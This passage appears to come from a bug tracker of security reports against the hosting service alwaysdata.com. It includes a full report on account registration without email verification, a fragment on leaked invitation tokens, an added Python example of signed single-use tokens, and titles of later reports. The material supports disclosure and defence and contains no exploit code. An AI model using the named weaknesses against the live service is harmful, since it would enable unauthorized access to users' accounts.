If exploited, this vulnerability could allow an attacker to gain unauthorized access to user accounts, potentially leading to data theft, unauthorized access to sensitive information, and other malicious activities.

Recommendations for Mitigation:

Token Encryption: Implement encryption mechanisms to protect user invitation tokens during transmission to and from the third-party service.
Secure Transmission: Ensure that communication channels between your system and the third-party service are secure, using protocols such as HTTPS.
Token Expiry: Implement token expiration mechanisms to limit the window of opportunity for exploitation.
Audit Access Logs: Regularly audit access logs for any suspicious activities or unauthorized access.

Proof of Concept (PoC):
Include relevant information or details demonstrating the vulnerability, ensuring that no sensitive information is disclosed in the report.

I appreciate your prompt attention to this matter and look forward to working collaboratively to address and resolve this security vulnerability.

Thank you.

Aditya

22  Vulnerability Report: Unverified Email Registration on  ...  Closed  31.01.2024  Task Description

I am writing to report a security vulnerability that I discovered on the Alwaysdata.com platform regarding unverified email registration. This vulnerability allows users to create new accounts without verifying their email addresses, posing a significant risk to the security and integrity of the platform and its users.

Below are the details of the vulnerability along with steps to reproduce, its impact, severity, and proposed solution:

Vulnerability Details:

Vulnerability Type: Unverified Email Registration
Website: https://www.alwaysdata.com/

Steps to Reproduce:

Visit the Alwaysdata.com website.
Navigate to the account registration page.
Enter any email address (valid or invalid) without going through email verification.
Complete the registration process without receiving or verifying any email confirmation.
Impact:

Account Takeover: Malicious actors can create accounts using others' email addresses and gain unauthorized access to their accounts or personal information.
Spam and Abuse: Unverified accounts can be used to send spam, phishing emails, or engage in other abusive activities on the platform.
Impersonation: Attackers can impersonate legitimate users or organizations by creating accounts with their email addresses.

Proposed Solution:
To mitigate this vulnerability, I recommend implementing email verification as a mandatory step during the registration process. This would involve sending a verification email with a unique code or link that users must confirm before their accounts are activated.

Additionally, consider implementing rate limiting or other measures to prevent abuse of the registration process and ensure that users' accounts and data are protected from unauthorized access and misuse.

I believe that addressing this vulnerability promptly will help enhance the security and trustworthiness of the Alwaysdata.com platform and protect its users from potential harm.

Please let me know if you require any further information or assistance in resolving this issue. I am committed to assisting you in any way possible to ensure the security of the platform and its users.

Thank you for your attention to this matter, and I look forward to your prompt response.
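This report and report 21 both come down to the properties of an e-mailed token: it has to be unforgeable, bound to one purpose and one address, time-limited, and usable once, so that a leaked or replayed link cannot verify or enrol anyone else. The following is an added example in Python (not alwaysdata's code and not part of either report) of such a token using only the standard library: an HMAC-SHA256 signature over a small JSON payload, a TTL, and a server-side set of nonces that have already been honoured. The secret, purpose strings, payload layout and TTLs are assumptions for the example.

```python
import base64
import hashlib
import hmac
import json
import secrets
from typing import Optional, Set

# Constructed example: a signed, expiring, single-use token for e-mail
# verification and user invitations. The server keeps only the set of nonces it
# has already honoured; everything else is inside the token and protected by the
# HMAC. SECRET and the purpose names are assumptions for this example.

SECRET = secrets.token_bytes(32)   # per deployment, loaded from config in practice, never committed


def _b64e(data: bytes) -> bytes:
    return base64.urlsafe_b64encode(data).rstrip(b"=")


def _b64d(data: bytes) -> bytes:
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def issue_token(purpose: str, email: str, now: float, ttl: int, secret: bytes = SECRET) -> str:
    """Return '<payload>.<signature>' bound to purpose, address, expiry and a fresh nonce."""
    payload = {"p": purpose, "e": email.strip().lower(),
               "exp": int(now) + ttl, "n": secrets.token_hex(16)}
    body = _b64e(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret, body, hashlib.sha256).digest()
    return (body + b"." + _b64e(sig)).decode()


def redeem_token(token: str, purpose: str, now: float, used: Set[str],
                 secret: bytes = SECRET) -> Optional[str]:
    """Return the verified e-mail address, or None. The nonce is burned on success only."""
    try:
        body, sig = token.encode().split(b".", 1)
        expected = hmac.new(secret, body, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64d(sig)):   # verify before parsing anything
            return None
        payload = json.loads(_b64d(body))
    except (ValueError, UnicodeError):
        return None
    if payload.get("p") != purpose or payload.get("exp", 0) < now:
        return None
    nonce = payload.get("n")
    if not nonce or nonce in used:
        return None
    used.add(nonce)
    return payload["e"]
```

The signature is checked before the payload is decoded, so malformed or tampered input is rejected without ever being parsed. Binding the purpose means an invitation token cannot be replayed against the verification endpoint and vice versa. For the leak in report 21, a token that expires and burns on first use limits what a third party can do with a copied URL; sending the link with a `Referrer-Policy: no-referrer` page and keeping the token out of query strings that reach analytics scripts removes the leak itself.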

23  Subject: Vulnerability Report: Transmission of Credenti ...  Closed  02.02.2024
24  Security Report:Broken Access Control (BAC) in [admin.a ...  Closed  01.02.2024
25  Title: Security Report: Public Exposure of Sensitive In ...  Closed  04.02.2024
26  #1 Crititical Vulnerability Name: No Rate Limit in addi ...  Closed  06.02.2024
27  Text Injection  Closed  06.02.2024
28  Summary: A username disclosure vulnerability has been i ...  Closed  13.02.2024
29  URL Override in api.alwaysdata.com  Closed  16.02.2024
30  Information Disclosure on cAdvisor software via Origin  ...  Closed  16.02.2024
31  Broken Access Vulnerability via 'Impossible deletion' E ...  Closed  16.02.2024
32  Server Path Traversal + Information Disclosure on admin ...  Closed  15.02.2024
33  Privilege Escalation in admin.alwaysdata.com - Academic ...  Closed  16.02.2024
35  Git Folder Forbidden Bypass  Closed  22.02.2024
37  unverified password change in [admin.alwaysdata.com]  Closed  27.03.2024
38  Bug Title: Prototype Pollution Vulnerability Report  Closed  19.03.2024
39  PII Disclosure  Closed  28.03.2024
40  No Rate Limit On Reset Password in admin.alwaysdata.co ...  Closed  27.03.2024
41  Directory Listing of Unauthorized Xapian Files  Closed  27.03.2024
42  Git Configuration Exposure  Closed  27.03.2024
43  Information Disclosure PHPpgAdmin  Closed  03.04.2024
44  Security Vulnerability | Business Logic Flaw  Closed  28.03.2024
45  Bug Title: Missing access control at password change.  Closed  09.04.2024
46  Open Redirection Vulnerability  Closed  13.04.2024
47  information disclosure  Closed  13.04.2024
48  Clickjacking (On-click) Vulnerability in Support Ticket ...  Closed  24.04.2024
49  Vulnerability Report: Lack of Rate Limiting on Password ...  Closed  24.04.2024
Showing tasks 1 - 50 of 139 Page 1 of 3
